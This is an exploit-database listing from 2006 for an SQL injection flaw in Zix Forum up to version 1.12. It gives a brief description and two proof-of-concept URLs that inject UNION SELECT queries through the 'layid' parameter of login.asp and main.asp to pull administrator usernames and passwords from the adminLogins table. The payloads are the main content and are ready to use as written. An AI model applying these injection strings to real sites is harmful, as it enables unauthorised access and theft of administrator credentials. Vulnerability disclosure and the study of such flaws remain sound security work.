[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Zix Forum <= 1.12 (layid) SQL Injection Vulnerability

Author
FarhadKey
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-430
Category
web applications
Date add
18-05-2006
Platform
unsorted
=====================================================
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
=====================================================



Zix Forum <= 1.12 (layid) SQL Injection Vulnerability


Vulnerability:
--------------------
SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in clear text .


Proof of Concepts:
--------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'

-------

By FarhadKey On 19 May 2006



#  0day.today [2024-12-25]  #